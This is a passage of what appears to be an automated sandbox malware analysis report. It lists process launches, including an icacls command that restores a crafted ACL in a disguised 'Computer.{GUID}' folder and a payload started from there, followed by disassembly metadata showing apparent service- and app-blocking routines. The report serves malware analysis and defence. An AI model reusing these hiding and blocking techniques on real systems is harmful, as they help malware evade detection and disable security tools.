MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:54:01
Start date:	11/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Imagebase:	0x7ff709000000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:54:01
Start date:	11/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:54:31
Start date:	11/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	10:54:31
Start date:	11/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Imagebase:	0x7ff751e60000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:54:31
Start date:	11/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188
Imagebase:	0x7ff751e60000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:54:51
Start date:	11/10/2024
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff7c1ab0000
File size:	89'088 bytes
MD5 hash:	4E320E2F46342D6D4657D2ADBF1F22D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 02739D02 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273A05F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273A065
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273A06B

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
Instruction ID: c3a280d0185942b417767dcebab6ca4e246b6188e66b83ca3be8fc16f3164ffe
Opcode Fuzzy Hash: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
Instruction Fuzzy Hash: 95B17F71918A4C8FDB56EF28C884A9EB7E1FFA8314F50571AE88AD3256DB70D481CB41

Function 0273CDB2 Relevance: 3.3, APIs: 2, Instructions: 338COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273D0F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273D0FD

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
Instruction ID: 42279980a4c84adda9e365fce6c6f1ced7bdae2729d1aa1a71cc3de2535cb6c0
Opcode Fuzzy Hash: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
Instruction Fuzzy Hash: 70A19071928B8C8BDB56EF2CC8856EA77E2FB99310F10571AE88AD3155DB30D581CB81

Function 02734B56 Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
Instruction ID: 0ac4565218d8433801be45b3cc18ad049c2ef05f9b4b5b152c911c7e73a37ce4
Opcode Fuzzy Hash: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
Instruction Fuzzy Hash: 28A1C731628E0C8FCB5AEF18C4996ADB3E1FBA9314F00465AD44ED7156DB30D945CB85

Function 0274D132 Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 0274D381

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: _clrfp
String ID:
API String ID: 3618594692-0
Opcode ID: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
Instruction ID: a3b16b21b84fb6496fd466e5a58c1b48d6cacd2d4f049a6b95a5b74a5005ba9b
Opcode Fuzzy Hash: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
Instruction Fuzzy Hash: 37B16A31510A4DCFDBA9CF1CC88AB6677E1FF49308F198599E899CB262C735E852CB01

Function 02737F3A Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
Instruction ID: b46c35b89ec834784965a015606a7a18c931a156816961a429540460974b0ce5
Opcode Fuzzy Hash: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
Instruction Fuzzy Hash: 6BE16431928B4C8BC74ADF68C8956BAB3E1FFE8300F50571EE486D7255EB74A644C782

Function 0274702E Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
Instruction ID: 2f05fc9b7793f6db4af47e8734025b0febd236552436d319cdfbad36b5dc4e84
Opcode Fuzzy Hash: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
Instruction Fuzzy Hash: 4261C470A1CF5C4FDB2CEF68984916ABBE5EB85710F14465FE886C3155DF70A8428AC2

Function 027453FA Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
Instruction ID: cb93d3746398458390b6486c115dd25f2b707b305e112ba9ee04b2fc6540aaee
Opcode Fuzzy Hash: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
Instruction Fuzzy Hash: 8451F032318E0C8F8B0CDE6CE49957673E2E7AC325355822EE40ED72A5DF70E8468781

Function 027360DA Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction ID: 174ff80fd420207a74260161ac038d8107eed192ac3591f5df9560f9d846107f
Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction Fuzzy Hash: D821C8317126054BE70CCE2EC89A575B3D6F7D9205B54C27DE14BCB357CD3258038A08

Function 02735B4A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction ID: 66d804b938f90c6aedd504aed4c49513dfc2d7d7da1cd4c4d155d13b269c81bb
Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction Fuzzy Hash: 0811A1723108048FD74DCE3DC98AAA573D6EB89304B58C2BDE55ACB26AD6358903C744

Function 02740D72 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02740DCF

Part of subcall function 02743132: __GetUnwindTryBlock.LIBCMT ref: 02743175
Part of subcall function 02743132: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0274319A

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02740EA7
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 027410F5
std::bad_alloc::bad_alloc.LIBCMT ref: 02741202

Strings

csm, xrefs: 02740E50
csm, xrefs: 02740DE9
csm, xrefs: 02740ECA

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
Instruction ID: 3196b31972fd0869732f338b9349de742021e142e5e9148144a0c1f6e9470638
Opcode Fuzzy Hash: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
Instruction Fuzzy Hash: D2E1B130A18B488FDB19EF68C489BAA77E1FB99354F50065ED849D7261DF34E4C1CB82

Function 02741242 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 027413E0
std::bad_alloc::bad_alloc.LIBCMT ref: 02741709

Strings

csm, xrefs: 02741327
csm, xrefs: 02741389
csm, xrefs: 02741407

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
Instruction ID: f38c54bd6a7af62a3931dea612d7ac71ee9cd84975d4bf88e1c3c05821769a17
Opcode Fuzzy Hash: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
Instruction Fuzzy Hash: 40E1D530918B488FCB19EF28C4896AAB7E1FB59314F54466DD49AC7652DF30E5C2CF82

Function 02740642 Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 02740765
__AdjustPointer.LIBCMT ref: 027407B0

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
Instruction ID: 8331186c3b28db98334bbf796730f1b307ed377b3cef09600454a92c1b3c9805
Opcode Fuzzy Hash: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
Instruction Fuzzy Hash: 60C1F530518F1B8FDB2EEF688058675B2D1FB95714B58466ED98AC3256EF30D881CBC2

Function 0273A41E Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

, xrefs: 0273A67E
P!`, xrefs: 0273A726
(, xrefs: 0273A6D2
H, xrefs: 0273A6BC
2, xrefs: 0273A673
`, xrefs: 0273A4BF

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID:
String ID: $($2$H$P!`$`
API String ID: 0-2682688576
Opcode ID: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
Instruction ID: b750d099307f2cad2ac505428fb76ba80bc875be27ffc4384d213495f2fecf32
Opcode Fuzzy Hash: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
Instruction Fuzzy Hash: 37C1F3B09087988FD7A5DF18C08979ABBE0FB99304F508A6ED8CDCB215DB705589CF46

Function 027419B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02741A71

Strings

MOC, xrefs: 02741A3A
RCC, xrefs: 02741A42

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
Instruction ID: c2d88ca4d6540f754a653240d39081b6f1e66d590871a24545c917c516492f4f
Opcode Fuzzy Hash: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
Instruction Fuzzy Hash: ECA1B430918B488FCB19EF6CC885AA9BBF1FB98314F54465EE449C7112EF34E581CB86

Function 0274007A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 027400A5
_IsNonwritableInCurrentImage.LIBCMT ref: 0274013C

Strings

csm, xrefs: 02740123

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
Instruction ID: 4b6297b8b38d76cc29c7e65b6c6ede55eed366a90ad7a31bc8d705eb31c43454
Opcode Fuzzy Hash: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
Instruction Fuzzy Hash: 9761903021CA088BDB2CEE6CE885B7973D1FB54354F10456DEE8AC7296EF70E8518B85

Function 02741746 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 027417F1

Strings

RCC, xrefs: 027417C1
MOC, xrefs: 027417B9

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
Instruction ID: a69e7c7dc5c006bde32f57f56c0b3d37308ff554ee525de231ae673728270114
Opcode Fuzzy Hash: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
Instruction Fuzzy Hash: A4717E30518B888FDB69EF18C446BAAB7E0FB99314F544A5EE48DC3211DB74E5C1CB82

Function 02742806 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 027428B0
_CreateFrameInfo.LIBVCRUNTIME ref: 027428D9

Strings

csm, xrefs: 027429D9

Memory Dump Source

Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_file.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction ID: d0619b691f086f5202510b79506c5bb1ae8d00ae0f0527e337938a150c0fc311
Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction Fuzzy Hash: 325161B0618B488FD765EF28C48976A77E1FB89351F10055EE98EC7261DB30E942CF86

Analysis Process: file.exePID: 5232, Parent PID: 552COMMON

Execution Graph

Execution Coverage:	59.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02BD01B0 Relevance: 9.3, APIs: 6, Instructions: 317
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02BD0215
VirtualProtect.KERNELBASE ref: 02BD0301
VirtualFree.KERNELBASE ref: 02BD0332
VirtualFree.KERNELBASE ref: 02BD0358
VirtualAlloc.KERNELBASE ref: 02BD037B
VirtualProtect.KERNELBASE ref: 02BD051B

Memory Dump Source

Source File: 00000001.00000002.2954668090.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2bd0000_file.jbxd

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction ID: 4abe9f3599fa4d5f3ac6de6fd51bb5e5653cfe7ea233a6892130af3a1cb51cbd
Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction Fuzzy Hash: CBC1BA3421CA488FD784EF5CC498B6AB7E1FB98315F51589DF48AC7261DBB4E881CB06

Function 02BD0620 Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 02BD063A

Memory Dump Source

Source File: 00000001.00000002.2954668090.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2bd0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

Analysis Process: cwjk513wjc7a1mlgh3.exePID: 560, Parent PID: 5232COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8%
Total number of Nodes:	1742
Total number of Limit Nodes:	8

Executed Functions

Function 00007FF64B938CFC Relevance: 40.5, APIs: 9, Strings: 14, Instructions: 281
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF64B939BB9: strcmp.MSVCRT ref: 00007FF64B939CAD

Part of subcall function 00007FF64B931CF4: LoadLibraryA.KERNEL32 ref: 00007FF64B931D02

FreeLibrary.KERNEL32 ref: 00007FF64B938DAC

Part of subcall function 00007FF64B931C73: GetProcAddress.KERNEL32 ref: 00007FF64B931C93

strlen.MSVCRT ref: 00007FF64B938EEF
GetProcessHeap.KERNEL32 ref: 00007FF64B938F6B
HeapAlloc.KERNEL32 ref: 00007FF64B938F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF64B939010

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF64B93905D
GetProcessHeap.KERNEL32 ref: 00007FF64B9390F2
HeapFree.KERNEL32 ref: 00007FF64B939103
LocalFree.KERNEL32 ref: 00007FF64B9391E4

Part of subcall function 00007FF64B9314E2: EnterCriticalSection.KERNEL32 ref: 00007FF64B9315B3
Part of subcall function 00007FF64B9314E2: LeaveCriticalSection.KERNEL32 ref: 00007FF64B9315DB
Part of subcall function 00007FF64B9314E2: CopyFileA.KERNEL32 ref: 00007FF64B931638

Strings

RtlFreeUnicodeString, xrefs: 00007FF64B938DD4
mem_alloc, xrefs: 00007FF64B9390AC
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF64B939077
[E] (%s) -> RtlCreateServiceSid failed(res=%08lx), xrefs: 00007FF64B938E52, 00007FF64B9390D3
RtlAnsiStringToUnicodeString, xrefs: 00007FF64B938D73
ntdll.dll, xrefs: 00007FF64B938D5F
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF64B9390B3
RtlCopyMemory, xrefs: 00007FF64B938E09
block_svc, xrefs: 00007FF64B938E31, 00007FF64B938E4B, 00007FF64B939070, 00007FF64B9390CC, 00007FF64B9391F2
[I] (%s) -> Done(svc_name=%s), xrefs: 00007FF64B9391F9
svc, xrefs: 00007FF64B938D2C
RtlCreateServiceSid, xrefs: 00007FF64B938DB7
[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx), xrefs: 00007FF64B938E38
RtlZeroMemory, xrefs: 00007FF64B938DF1

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
API String ID: 3039259412-1782951725
Opcode ID: 085100755b162324d195efedc5dcc3635e9143eb137912d90151acc8889682c7
Instruction ID: 30566b62184caa70c9b6bcabb0481af6f9fcfde055c1389941aab13a68de6f83
Opcode Fuzzy Hash: 085100755b162324d195efedc5dcc3635e9143eb137912d90151acc8889682c7
Instruction Fuzzy Hash: 1ED14E21A0CA8385FB60BB55E8843BA6250AF9E344F505036DA9EC6FB7DF7DE845C701

Function 00007FF64B93855D Relevance: 31.9, APIs: 10, Strings: 8, Instructions: 393COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64B939BB9: strcmp.MSVCRT ref: 00007FF64B939CAD

Process32Next.KERNEL32 ref: 00007FF64B938671
GetLastError.KERNEL32 ref: 00007FF64B93867D
GetLastError.KERNEL32 ref: 00007FF64B9386C1
GetLastError.KERNEL32 ref: 00007FF64B9387A3
OpenProcess.KERNEL32 ref: 00007FF64B9388DC
QueryFullProcessImageNameW.KERNEL32 ref: 00007FF64B938920
GetLastError.KERNEL32 ref: 00007FF64B93892E
CloseHandle.KERNEL32 ref: 00007FF64B938CA8

Strings

[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF64B9387BE
app, xrefs: 00007FF64B93858D
[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu), xrefs: 00007FF64B938940
[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu), xrefs: 00007FF64B938A8F
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF64B938694
[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d), xrefs: 00007FF64B938A32
block_app, xrefs: 00007FF64B93868D, 00007FF64B9386CC, 00007FF64B9387B7, 00007FF64B938939, 00007FF64B938A2B, 00007FF64B938A88
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF64B9386D3

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
API String ID: 1025937399-1899507746
Opcode ID: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
Instruction ID: b519649e64c151574be1daab39afd773dd7ad259e4f67dc04b382352114ac69a
Opcode Fuzzy Hash: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
